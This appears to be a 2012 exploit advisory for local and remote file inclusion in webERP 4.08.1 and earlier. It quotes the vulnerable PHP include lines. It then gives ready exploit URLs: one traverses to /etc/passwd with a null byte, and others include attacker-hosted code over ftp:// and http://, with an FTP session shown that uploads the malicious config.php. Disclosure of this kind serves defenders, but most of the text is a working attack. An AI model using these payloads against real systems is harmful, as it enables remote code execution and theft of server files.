:::::::-. ...::::::.:::. ;;, `';, ;; ;;;`;;;;,`;;; `[[ [[[[' [[[[[[[[. '[[ $$,$$$$$$$$$$ "Y$c$$ 888_,o8P'88.d888888Y88 MMMMP"` "YmmMMMM""MMM YM [ Discovered by dun \ posdub[at]gmail.com ] [ 2012-06-27] ################################################################### # [ webERP <= 4.08.1 ] Local/Remote File Inclusion Vulnerability# ################################################################### # # Script: "Accounting & Best Practice Business Administration System" # # Vendor: http://www.weberp.org/ # Download: http://sourceforge.net/projects/web-erp/files/ # # File: ./webERP/index.php (line: 4) # 1<?php # 2$PageSecurity=0; # 3 # 4include('includes/session.inc');// 1 #..cut.. # # File: ./webERP/includes/session.inc (lines: 4-16) #..cut.. # 4if (!isset($PathPrefix)) {// 2 # 5$PathPrefix=''; # 6} # 7 # 8 # 9if (!file_exists($PathPrefix . 'config.php')){// 3 #10$rootpath = dirname(htmlspecialchars($_SERVER['PHP_SELF'],ENT_QUOTES,'UTF-8')); #11if ($rootpath == '/' OR $rootpath == "\\") { #12$rootpath = ''; #13} #14header('Location:' . $rootpath . '/install/index.php'); #15} #16include($PathPrefix . 'config.php');// 4 [LFI]/[RFI] #..cut.. # # [LFI] ( magic_quotes_gpc = Off; ) # Vuln: http://localhost/webERP/index.php?PathPrefix=../../../../../../etc/passwd%00 # # [RFI #1] ( allow_url_fopen = On; allow_url_include = On; register_globals = On; ) # It is possible to bypass line: (!file_exists($PathPrefix . 'config.php')), # when we use some url wrappers. For example ftp:// # Example: # # dun@rd01 ~ $ cat ./config.php #<?php phpinfo(); ?> # dun@rd01 ~ $ ftp ftp.server.com #Connected to ftp.server.com. #Name (ftp.server.com): user #331 User user OK. Password required #Password: #230 OK. Current restricted directory is / #ftp> put config.php #local: config.php remote: config.php #200 PORT command successful #226 File successfully transferred #ftp> quit #221 Logout. # # Now we can use url: # Vuln: http://localhost/webERP/index.php?PathPrefix=ftp://user:password@ftp.server.com/ # In this case, script checks if the file 'ftp://user:password@ftp.server.com/' . 'config.php' does not exist. # If exist, then include it. # ################################################################### # # [RFI #2] ( allow_url_include = On; register_globals = On; ) # # File: ./webERP/includes/LanguageSetup.php (lines: 29-84) #..cut.. #29if (!function_exists('gettext')) { #..cut.. #34require_once($PathPrefix . 'includes/php-gettext/streams.php'); #..cut.. #64} else { #65include($PathPrefix . 'includes/LanguagesArray.php'); #..cut.. #84} #..cut.. # # Vuln: http://localhost/webERP/includes/LanguageSetup.php?PathPrefix=http://localhost/phpinfo.txt? # ### [ dun / 2012 ] #####################################################
体验盒子
